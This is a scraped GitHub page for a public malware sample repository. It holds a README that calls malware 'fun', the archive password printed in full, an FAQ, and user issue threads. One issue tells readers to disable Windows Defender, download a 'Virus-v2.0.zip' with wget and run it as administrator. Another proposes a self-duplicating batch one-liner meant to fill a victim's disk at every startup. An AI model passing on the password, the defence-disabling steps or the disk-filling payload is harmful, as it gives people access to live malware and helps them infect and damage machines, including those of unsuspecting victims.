This repository is one of a few malware collections on the GitHub.

Overview

Malware Database

Disclaimer

This repository is one of the few malware collections on GitHub. Almost every sample here is malicious so I strongly recommend you to neither open these files on real hardware, nor misuse the malware to prank your friends. Playing with these samples may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

Table of contents

  1. Introduction
  2. Contributors
  3. About
  4. FAQ

Introduction

Most of people say: "Malware isn't a toy to play with!", however, I don't hold such an opinion. Malware is fun, if you know how to play with it! 😉 In my opinion, people who think opposite are gloomy and tedious or just afraid of it. Nonetheless, I still DO NOT recommend you using malware for your personal needs and benefits. If you want to ask any type of questions (e. g. Archive password doesn't match; Provided malware doesn't work! etc.) use the "Issues" tab. Also here are the steps if you want to support me and my repository!

Any type of support will be highly appreciated!

Contributors

This is a list of people who really helped me (excluding myself):

About

My malware repository isn't excellent, however, I am trying my best to convince you 😄

About

Password

The password for all archives is mysubsarethebest!

Percentage

Here is a table of approximate percentage ratio of malware in my repository.

Malware type Percentage
Rogue (Fraud) 40%
Joke 35%
Trojan 10%
Ransomware 10%
Self-made / Viewer-made 5%

FAQ

Here you can find answers to frequently asked questions. This may be helpful!

Q: What is the password for the archive I've downloaded?
A: It is mysubsarethebest... Read the description carefully!

Q: I know I didn't misspell the password for the archive, however it STILL won't unlock. What do I do?
A: Check for the mistakes again, if it doesn't help then create an issue, I will reupload the one you're struggling with. Mistakes can happen!

Q: I can't find the sample I need which you reviewed on your channel, why?
A: I am happy to announce the malware series are back, although I cannot guarantee the presence of every sample reviewed on my channel. Create an issue if you don't find a sample you really want, I (or my moderator) will help you shortly after. But please, please don't spam with your requests in issues. Send them to my mailbox. (mentioned in the 4th question)

Q: Can I contribute to your malware database? If yes, how?
A: Yes, of course you can. You can send your malware (no batch or bat2exe files, please) to my mailbox! ([email protected]) Only the best of the best will be reviewed and put here.

Endermanch, 2020

Comments
  • Please help my with my sons iPhone :(

    Please help my with my sons iPhone :(

    Hey, my son downloaded or clicked an url with his iPhone. Now he has this "noescape" virus on his iPhone. He can't deinstall this app, in WhatsApp his profile picture and status changed to noescape pictures. How can we delete this virus? Please help me, he is a kid :(

    Now the virus tell the iPhones bootsector will be deleted in 10 minutes and the system apps changed to noescape.

    In WhatsApp this virus shared a link to this site, so I think you can help me please?

    opened by Helpmysonplease 34
  • NoEscape.exe payloads not working

    NoEscape.exe payloads not working

    I wanted to try to run NoEscape.exe in a VM and try to recover from it's September 18th payload.

    So I changed the date to September 18th and rebooted. But after the VM booted back up and I opened a program like 7-Zip, I didn't see notepad open up and threaten me, but 7-Zip opened. I tried this with different programs and years. Nothing worked.

    Here are my VM specs:

    • Hypervisor: VirtualBox (Don't insult me, VMware costs 200 US dollars. Plus I am more comfortable with VBox)
    • Guest OS: Windows 10 Home 2004 64-bit
    • Guest RAM: 4 GB
    • Guest CPU core count: 4
    • EFI: Enabled

    Can anyone explain to me what's going on and/or how to fix it?

    opened by BSOD-Master 21
  • NoEscape.exe Error - Please Help!

    NoEscape.exe Error - Please Help!

    Hello, I'm having a problem when attempting to execute NoEscape in a VM. First, it said that I need VCRUNTIME140.dll, so I found a copy of it and put it on the desktop, then that error went away, but i got another one saying "The application was unable to start correctly (0xc000007b). Click OK to close the application.". I tried reinstalling Microsoft Visual C++ and .NET 5 and nothing has fixed the problem. Please Help! Btw I'm running the latest version of Windows 10 available on Enderman's website. image

    opened by windoze11 19
  • CLOSED || Launcher Idea

    CLOSED || Launcher Idea

    this was a stupid idea by me, a launcher of malware with all the samples || closed this bc its boring getting replies with: What? DIY, wdym.... // done.

    opened by vpty 17
  • NoEscape error

    NoEscape error

    Everytime i try to open Noescape, it says, "The code execution cannot proceed because VCRUNTIME140.dll was not found. Reinstalling the program may fix this program." I know for a fact I have VCRUNTIME140.dll installed, and I reinstalled NoEscape 3 times. PLEASE HELP!

    opened by vaughhnn 12
  • OK, Trojan Virus here!

    OK, Trojan Virus here!

    File: Trojan Download what? about the "virus detected" message, download this using command prompt WGet. or use edge but disable windows defender first. go to https://github.com/webfolderio/wget-windows/releases/tag/1.21.1 and download both zip files with binary type mkdir %userprofile%\VirusFolder type cd %userprofile%\VirusFolder extract the WGet zipped contents to the same folder as the virus download, else it won't work type wget https://github.com/Endermanch/MalwareDatabase/files/6709864/Virus-v2.0.zip unzip the file and run it and make sure to run as administrator here or it won't work please ignore the icon i promise it is not a BAT2EXE or a batch file!!!!!!!!!!!!!!!!!!!! and run it in compatibility mode for windows make sure to go into Defender and right click the virus then "allow item" first before extracting

    opened by IAW9927 11
  • Please close this Endermanch

    Please close this Endermanch

    Will NoEscape still persist if I reinstall Windows? Or do the virus let me to reinstall during the Sep18 payload? If not, will the problem be fixed if I send my computer to Microsoft?

    opened by LarryZhaoatGmail 9
  • Add the 'Dupe' virus

    Add the 'Dupe' virus

    Hi Enderman, a virus that I'd like to submit to the user-submitted viruses!

    Here's the prospect:

    • Windows 10, a large amount of disk space (or even just ya average laptop's disk space)
    • Batch file in a hidden corner of the disk (maybe in Windows so no-one deletes it)
    • Gets called at startup (maybe something in startup folder that invokes it)

    The unsuspecting user would not know what to do as his/her disk space just keeps on getting bigger and bigger as this virus basically just duplicates itself (so it multiplies its size by 2x every iteration, thus making your disk space run out really quickly)!

    This virus works on nearly any version of Windows, starting from Windows 95 (and possibly even Windows 3). A shorter version of the virus (which can run on 99.9% of DOS shells, however old or new, regardless of brand) can be achieved by using the following for virus.bat (it's a one-liner!):

    type virus.bat >> virus.bat
    
    
    opened by James-Livesey 9
  • Can no escape spread via lan

    Can no escape spread via lan

    I wanted to know if no escape.exe can spread via lan because i wanted to try it out in vm if it's disconnected from the internet if so it infect my host os? i only ask cause i wanted to try it.

    opened by Totally-A-Boar 8
  • How do I get ddom.py working?

    How do I get ddom.py working?

    So I did what you did on your fake download button video (I downloaded the file and modules from the original poster), and when I try and run it on command prompt it says "No module named requests." Please help (I'm writing this on my host computer, The files are on a virtual machine.) h

    opened by EggbertCentral 6
  • Meta Virus (Testing Phases)

    Meta Virus (Testing Phases)

    New Virus! (site removed due to google getting mad at me) (only use if you need to! and the GitHub download is available in the site listed.) Please send me info if it doesn't work, it is still in testing phases and you can edit it as you wish, but if you do please send me a copy of the edited meta virus, and name it Meta-Virus-Ender-Edition, This will make sure I can recognize Meta Virus.zip it!

    opened by MetaMysteries8 2
  • MalwareBazaar by abuse.ch

    MalwareBazaar by abuse.ch

    MalwareBazaar is a public malware database with tons of samples. You can reach it at https://bazaar.abuse.ch/ My request is: implement malwarebazaar to daily dose of malware please? Thanks

    API Docs: https://bazaar.abuse.ch/api/#download

    opened by Vichingo455 0
  • Upload Setup_201

    Upload Setup_201

    Hello,

    I was wondering if uploading the Setup_201.exe file from --> this <-- video would be possible. I really want to play around with it, but I can't seem to generate it myself on the malware generator site.

    Thanks!

    opened by ThatDumbPan 0
Owner
Andrew
I'm just a youtuber :)
Andrew
Malware-analysis-writeups - Some of my Malware Analysis writeups

About This repo contains some malware analysis writeups i've created over time m

Itay Migdal 14 Jun 22, 2022
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Abdallah Elshinbary 48 Dec 19, 2022
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

null 27 Sep 23, 2022
A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck

Malware Configuration Extractor A Malware Configuration Extraction Tool and Modules for MalDuck This project is FREE as in FREE ?? , use it commercial

c3rb3ru5 103 Dec 18, 2022
An IDA pro python script to decrypt Qbot malware string

Qbot-Strings-Decrypter An IDA pro python script to decrypt Qbot malware strings.

stuckinvim 6 Sep 1, 2022
Discord Token Stealer Malware Protection

TokenGuard TokenGuard, protect your account, prevent token steal. Totally free and open source Discord Server: https://discord.gg/EmwfaGuBE8 Source Co

null 10 Nov 23, 2022
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

null 11 Nov 15, 2022
Android Malware (Analysis | Scoring) System

An Obfuscation-Neglect Android Malware Scoring System Quark-Engine is also bundled with Kali Linux, BlackArch. A trust-worthy, practical tool that's r

Quark-Engine 1k Jan 4, 2023
A guide to building basic malware in Python by implementing a keylogger application

Keylogger-Malware-Project A guide to building basic malware in Python by implementing a keylogger application. If you want even more detail on the Pro

Noah Davis 1 Jan 11, 2022
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own computer

Li Ka Lok 2 Dec 2, 2022
Detection tool of malware(s) by checksum (useful for forensic)

?? malware_checker.py Detection tool of malware(s) by checksum (useful for forensic) ?? Dependencies installation $ pip3 install -r requirements.txt

Fayred 1 Jan 30, 2022
Huskee: Malware made in Python for Educational purposes

???????????? Caracteristicas: Discord Token Grabber Wifi Passwords Grabber Googl

chew 4 Aug 17, 2022
This repo is about steps to create a effective custom wordlist in a few clicks/

Custom Wordlist This repo is about steps to take in order to create a effective custom wordlist in a few clicks. this comes handing in pentesting enga

null 2 Oct 8, 2022
PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github

CVE-2021-26855 PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github Why does github remove this exploit because

The Hacker's Choice 58 Nov 15, 2022
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

null 567 Dec 30, 2022